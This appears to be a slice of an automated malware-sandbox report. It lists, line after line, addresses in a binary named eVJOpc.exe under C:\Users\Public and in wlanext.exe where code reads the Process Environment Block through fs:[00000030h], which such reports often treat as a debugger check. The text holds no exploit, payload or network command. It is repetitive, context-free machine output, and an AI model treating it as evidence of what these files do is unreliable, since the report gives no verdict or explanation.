Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC6CF0 mov eax, dword ptr fs:[00000030h] 9_2_00BC6CF0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC6CF0 mov eax, dword ptr fs:[00000030h] 9_2_00BC6CF0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7BC2C mov eax, dword ptr fs:[00000030h] 9_2_00B7BC2C
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC6C0A mov eax, dword ptr fs:[00000030h] 9_2_00BC6C0A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC6C0A mov eax, dword ptr fs:[00000030h] 9_2_00BC6C0A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC6C0A mov eax, dword ptr fs:[00000030h] 9_2_00BC6C0A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC6C0A mov eax, dword ptr fs:[00000030h] 9_2_00BC6C0A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h] 9_2_00C01C06
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h] 9_2_00C01C06
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h] 9_2_00C01C06
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h] 9_2_00C01C06
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h] 9_2_00C01C06
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h] 9_2_00C01C06
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h] 9_2_00C01C06
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h] 9_2_00C01C06
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h] 9_2_00C01C06
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h] 9_2_00C01C06
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h] 9_2_00C01C06
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h] 9_2_00C01C06
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h] 9_2_00C01C06
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C01C06 mov eax, dword ptr fs:[00000030h] 9_2_00C01C06
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C1740D mov eax, dword ptr fs:[00000030h] 9_2_00C1740D
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C1740D mov eax, dword ptr fs:[00000030h] 9_2_00C1740D
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C1740D mov eax, dword ptr fs:[00000030h] 9_2_00C1740D
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B6746D mov eax, dword ptr fs:[00000030h] 9_2_00B6746D
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BDC450 mov eax, dword ptr fs:[00000030h] 9_2_00BDC450
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BDC450 mov eax, dword ptr fs:[00000030h] 9_2_00BDC450
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7A44B mov eax, dword ptr fs:[00000030h] 9_2_00B7A44B
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B71DB5 mov eax, dword ptr fs:[00000030h] 9_2_00B71DB5
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B71DB5 mov eax, dword ptr fs:[00000030h] 9_2_00B71DB5
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B71DB5 mov eax, dword ptr fs:[00000030h] 9_2_00B71DB5
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B735A1 mov eax, dword ptr fs:[00000030h] 9_2_00B735A1
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C0FDE2 mov eax, dword ptr fs:[00000030h] 9_2_00C0FDE2
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C0FDE2 mov eax, dword ptr fs:[00000030h] 9_2_00C0FDE2
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C0FDE2 mov eax, dword ptr fs:[00000030h] 9_2_00C0FDE2
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C0FDE2 mov eax, dword ptr fs:[00000030h] 9_2_00C0FDE2
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7FD9B mov eax, dword ptr fs:[00000030h] 9_2_00B7FD9B
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7FD9B mov eax, dword ptr fs:[00000030h] 9_2_00B7FD9B
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B72581 mov eax, dword ptr fs:[00000030h] 9_2_00B72581
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B72581 mov eax, dword ptr fs:[00000030h] 9_2_00B72581
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B72581 mov eax, dword ptr fs:[00000030h] 9_2_00B72581
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B72581 mov eax, dword ptr fs:[00000030h] 9_2_00B72581
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B42D8A mov eax, dword ptr fs:[00000030h] 9_2_00B42D8A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B42D8A mov eax, dword ptr fs:[00000030h] 9_2_00B42D8A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B42D8A mov eax, dword ptr fs:[00000030h] 9_2_00B42D8A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B42D8A mov eax, dword ptr fs:[00000030h] 9_2_00B42D8A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B42D8A mov eax, dword ptr fs:[00000030h] 9_2_00B42D8A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BF8DF1 mov eax, dword ptr fs:[00000030h] 9_2_00BF8DF1
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B5D5E0 mov eax, dword ptr fs:[00000030h] 9_2_00B5D5E0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B5D5E0 mov eax, dword ptr fs:[00000030h] 9_2_00B5D5E0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C105AC mov eax, dword ptr fs:[00000030h] 9_2_00C105AC
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C105AC mov eax, dword ptr fs:[00000030h] 9_2_00C105AC
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC6DC9 mov eax, dword ptr fs:[00000030h] 9_2_00BC6DC9
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC6DC9 mov eax, dword ptr fs:[00000030h] 9_2_00BC6DC9
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC6DC9 mov eax, dword ptr fs:[00000030h] 9_2_00BC6DC9
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC6DC9 mov ecx, dword ptr fs:[00000030h] 9_2_00BC6DC9
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC6DC9 mov eax, dword ptr fs:[00000030h] 9_2_00BC6DC9
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC6DC9 mov eax, dword ptr fs:[00000030h] 9_2_00BC6DC9
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h] 9_2_00B53D34
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h] 9_2_00B53D34
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h] 9_2_00B53D34
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h] 9_2_00B53D34
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h] 9_2_00B53D34
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h] 9_2_00B53D34
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h] 9_2_00B53D34
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h] 9_2_00B53D34
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h] 9_2_00B53D34
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h] 9_2_00B53D34
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h] 9_2_00B53D34
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h] 9_2_00B53D34
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B53D34 mov eax, dword ptr fs:[00000030h] 9_2_00B53D34
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B4AD30 mov eax, dword ptr fs:[00000030h] 9_2_00B4AD30
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BCA537 mov eax, dword ptr fs:[00000030h] 9_2_00BCA537
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B74D3B mov eax, dword ptr fs:[00000030h] 9_2_00B74D3B
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B74D3B mov eax, dword ptr fs:[00000030h] 9_2_00B74D3B
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B74D3B mov eax, dword ptr fs:[00000030h] 9_2_00B74D3B
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B6C577 mov eax, dword ptr fs:[00000030h] 9_2_00B6C577
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B6C577 mov eax, dword ptr fs:[00000030h] 9_2_00B6C577
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B67D50 mov eax, dword ptr fs:[00000030h] 9_2_00B67D50
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C18D34 mov eax, dword ptr fs:[00000030h] 9_2_00C18D34
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C0E539 mov eax, dword ptr fs:[00000030h] 9_2_00C0E539
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B83D43 mov eax, dword ptr fs:[00000030h] 9_2_00B83D43
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC3540 mov eax, dword ptr fs:[00000030h] 9_2_00BC3540
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BF3D40 mov eax, dword ptr fs:[00000030h] 9_2_00BF3D40
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C18ED6 mov eax, dword ptr fs:[00000030h] 9_2_00C18ED6
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC46A7 mov eax, dword ptr fs:[00000030h] 9_2_00BC46A7
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BDFE87 mov eax, dword ptr fs:[00000030h] 9_2_00BDFE87
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B716E0 mov ecx, dword ptr fs:[00000030h] 9_2_00B716E0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B576E2 mov eax, dword ptr fs:[00000030h] 9_2_00B576E2
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C10EA5 mov eax, dword ptr fs:[00000030h] 9_2_00C10EA5
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C10EA5 mov eax, dword ptr fs:[00000030h] 9_2_00C10EA5
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C10EA5 mov eax, dword ptr fs:[00000030h] 9_2_00C10EA5
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B736CC mov eax, dword ptr fs:[00000030h] 9_2_00B736CC
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BFFEC0 mov eax, dword ptr fs:[00000030h] 9_2_00BFFEC0
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B88EC7 mov eax, dword ptr fs:[00000030h] 9_2_00B88EC7
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BFFE3F mov eax, dword ptr fs:[00000030h] 9_2_00BFFE3F
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C0AE44 mov eax, dword ptr fs:[00000030h] 9_2_00C0AE44
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C0AE44 mov eax, dword ptr fs:[00000030h] 9_2_00C0AE44
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B4E620 mov eax, dword ptr fs:[00000030h] 9_2_00B4E620
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7A61C mov eax, dword ptr fs:[00000030h] 9_2_00B7A61C
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7A61C mov eax, dword ptr fs:[00000030h] 9_2_00B7A61C
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B4C600 mov eax, dword ptr fs:[00000030h] 9_2_00B4C600
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B4C600 mov eax, dword ptr fs:[00000030h] 9_2_00B4C600
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B4C600 mov eax, dword ptr fs:[00000030h] 9_2_00B4C600
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B78E00 mov eax, dword ptr fs:[00000030h] 9_2_00B78E00
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B6AE73 mov eax, dword ptr fs:[00000030h] 9_2_00B6AE73
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B6AE73 mov eax, dword ptr fs:[00000030h] 9_2_00B6AE73
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B6AE73 mov eax, dword ptr fs:[00000030h] 9_2_00B6AE73
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B6AE73 mov eax, dword ptr fs:[00000030h] 9_2_00B6AE73
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B6AE73 mov eax, dword ptr fs:[00000030h] 9_2_00B6AE73
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C01608 mov eax, dword ptr fs:[00000030h] 9_2_00C01608
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B5766D mov eax, dword ptr fs:[00000030h] 9_2_00B5766D
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B57E41 mov eax, dword ptr fs:[00000030h] 9_2_00B57E41
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B57E41 mov eax, dword ptr fs:[00000030h] 9_2_00B57E41
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B57E41 mov eax, dword ptr fs:[00000030h] 9_2_00B57E41
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B57E41 mov eax, dword ptr fs:[00000030h] 9_2_00B57E41
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B57E41 mov eax, dword ptr fs:[00000030h] 9_2_00B57E41
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B57E41 mov eax, dword ptr fs:[00000030h] 9_2_00B57E41
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B58794 mov eax, dword ptr fs:[00000030h] 9_2_00B58794
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC7794 mov eax, dword ptr fs:[00000030h] 9_2_00BC7794
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC7794 mov eax, dword ptr fs:[00000030h] 9_2_00BC7794
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BC7794 mov eax, dword ptr fs:[00000030h] 9_2_00BC7794
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B837F5 mov eax, dword ptr fs:[00000030h] 9_2_00B837F5
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7E730 mov eax, dword ptr fs:[00000030h] 9_2_00B7E730
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B44F2E mov eax, dword ptr fs:[00000030h] 9_2_00B44F2E
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B44F2E mov eax, dword ptr fs:[00000030h] 9_2_00B44F2E
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B6F716 mov eax, dword ptr fs:[00000030h] 9_2_00B6F716
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C18F6A mov eax, dword ptr fs:[00000030h] 9_2_00C18F6A
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BDFF10 mov eax, dword ptr fs:[00000030h] 9_2_00BDFF10
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00BDFF10 mov eax, dword ptr fs:[00000030h] 9_2_00BDFF10
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7A70E mov eax, dword ptr fs:[00000030h] 9_2_00B7A70E
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B7A70E mov eax, dword ptr fs:[00000030h] 9_2_00B7A70E
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C1070D mov eax, dword ptr fs:[00000030h] 9_2_00C1070D
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00C1070D mov eax, dword ptr fs:[00000030h] 9_2_00C1070D
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B5FF60 mov eax, dword ptr fs:[00000030h] 9_2_00B5FF60
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00B5EF40 mov eax, dword ptr fs:[00000030h] 9_2_00B5EF40
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0339131B mov eax, dword ptr fs:[00000030h] 19_2_0339131B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h] 19_2_032FA309
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h] 19_2_032FA309
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h] 19_2_032FA309
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h] 19_2_032FA309
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h] 19_2_032FA309
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h] 19_2_032FA309
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h] 19_2_032FA309
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h] 19_2_032FA309
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h] 19_2_032FA309
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h] 19_2_032FA309
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h] 19_2_032FA309
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h] 19_2_032FA309
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h] 19_2_032FA309
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h] 19_2_032FA309
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h] 19_2_032FA309
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h] 19_2_032FA309
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h] 19_2_032FA309
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h] 19_2_032FA309
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h] 19_2_032FA309
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h] 19_2_032FA309
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FA309 mov eax, dword ptr fs:[00000030h] 19_2_032FA309
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03303B7A mov eax, dword ptr fs:[00000030h] 19_2_03303B7A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03303B7A mov eax, dword ptr fs:[00000030h] 19_2_03303B7A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032DDB60 mov ecx, dword ptr fs:[00000030h] 19_2_032DDB60
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032D7B70 mov eax, dword ptr fs:[00000030h] 19_2_032D7B70
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032EF370 mov eax, dword ptr fs:[00000030h] 19_2_032EF370
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032EF370 mov eax, dword ptr fs:[00000030h] 19_2_032EF370
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032EF370 mov eax, dword ptr fs:[00000030h] 19_2_032EF370
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033A8B58 mov eax, dword ptr fs:[00000030h] 19_2_033A8B58
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03303B5A mov eax, dword ptr fs:[00000030h] 19_2_03303B5A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03303B5A mov eax, dword ptr fs:[00000030h] 19_2_03303B5A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03303B5A mov eax, dword ptr fs:[00000030h] 19_2_03303B5A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03303B5A mov eax, dword ptr fs:[00000030h] 19_2_03303B5A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032DDB40 mov eax, dword ptr fs:[00000030h] 19_2_032DDB40
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032DF358 mov eax, dword ptr fs:[00000030h] 19_2_032DF358
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033A9BBE mov eax, dword ptr fs:[00000030h] 19_2_033A9BBE
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033A8BB6 mov eax, dword ptr fs:[00000030h] 19_2_033A8BB6
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03391BA8 mov eax, dword ptr fs:[00000030h] 19_2_03391BA8
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03304BAD mov eax, dword ptr fs:[00000030h] 19_2_03304BAD
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03304BAD mov eax, dword ptr fs:[00000030h] 19_2_03304BAD
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03304BAD mov eax, dword ptr fs:[00000030h] 19_2_03304BAD
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033A5BA5 mov eax, dword ptr fs:[00000030h] 19_2_033A5BA5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0330B390 mov eax, dword ptr fs:[00000030h] 19_2_0330B390
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032E1B8F mov eax, dword ptr fs:[00000030h] 19_2_032E1B8F
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032E1B8F mov eax, dword ptr fs:[00000030h] 19_2_032E1B8F
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03302397 mov eax, dword ptr fs:[00000030h] 19_2_03302397
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0339138A mov eax, dword ptr fs:[00000030h] 19_2_0339138A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FEB9A mov eax, dword ptr fs:[00000030h] 19_2_032FEB9A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FEB9A mov eax, dword ptr fs:[00000030h] 19_2_032FEB9A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0338D380 mov ecx, dword ptr fs:[00000030h] 19_2_0338D380
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032D4B94 mov edi, dword ptr fs:[00000030h] 19_2_032D4B94
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0330138B mov eax, dword ptr fs:[00000030h] 19_2_0330138B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0330138B mov eax, dword ptr fs:[00000030h] 19_2_0330138B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0330138B mov eax, dword ptr fs:[00000030h] 19_2_0330138B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0337EB8A mov ecx, dword ptr fs:[00000030h] 19_2_0337EB8A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0337EB8A mov eax, dword ptr fs:[00000030h] 19_2_0337EB8A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0337EB8A mov eax, dword ptr fs:[00000030h] 19_2_0337EB8A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0337EB8A mov eax, dword ptr fs:[00000030h] 19_2_0337EB8A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032D1BE9 mov eax, dword ptr fs:[00000030h] 19_2_032D1BE9
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FDBE9 mov eax, dword ptr fs:[00000030h] 19_2_032FDBE9
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033003E2 mov eax, dword ptr fs:[00000030h] 19_2_033003E2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033003E2 mov eax, dword ptr fs:[00000030h] 19_2_033003E2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033003E2 mov eax, dword ptr fs:[00000030h] 19_2_033003E2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033003E2 mov eax, dword ptr fs:[00000030h] 19_2_033003E2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033003E2 mov eax, dword ptr fs:[00000030h] 19_2_033003E2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033003E2 mov eax, dword ptr fs:[00000030h] 19_2_033003E2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033823E3 mov ecx, dword ptr fs:[00000030h] 19_2_033823E3
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033823E3 mov ecx, dword ptr fs:[00000030h] 19_2_033823E3
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033823E3 mov eax, dword ptr fs:[00000030h] 19_2_033823E3
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033053C5 mov eax, dword ptr fs:[00000030h] 19_2_033053C5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033553CA mov eax, dword ptr fs:[00000030h] 19_2_033553CA
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033553CA mov eax, dword ptr fs:[00000030h] 19_2_033553CA
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FA229 mov eax, dword ptr fs:[00000030h] 19_2_032FA229
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FA229 mov eax, dword ptr fs:[00000030h] 19_2_032FA229
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FA229 mov eax, dword ptr fs:[00000030h] 19_2_032FA229
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FA229 mov eax, dword ptr fs:[00000030h] 19_2_032FA229
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FA229 mov eax, dword ptr fs:[00000030h] 19_2_032FA229
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FA229 mov eax, dword ptr fs:[00000030h] 19_2_032FA229
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FA229 mov eax, dword ptr fs:[00000030h] 19_2_032FA229
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FA229 mov eax, dword ptr fs:[00000030h] 19_2_032FA229
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FA229 mov eax, dword ptr fs:[00000030h] 19_2_032FA229
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032D4A20 mov eax, dword ptr fs:[00000030h] 19_2_032D4A20
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032D4A20 mov eax, dword ptr fs:[00000030h] 19_2_032D4A20
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03391229 mov eax, dword ptr fs:[00000030h] 19_2_03391229
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032D8239 mov eax, dword ptr fs:[00000030h] 19_2_032D8239
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032D8239 mov eax, dword ptr fs:[00000030h] 19_2_032D8239
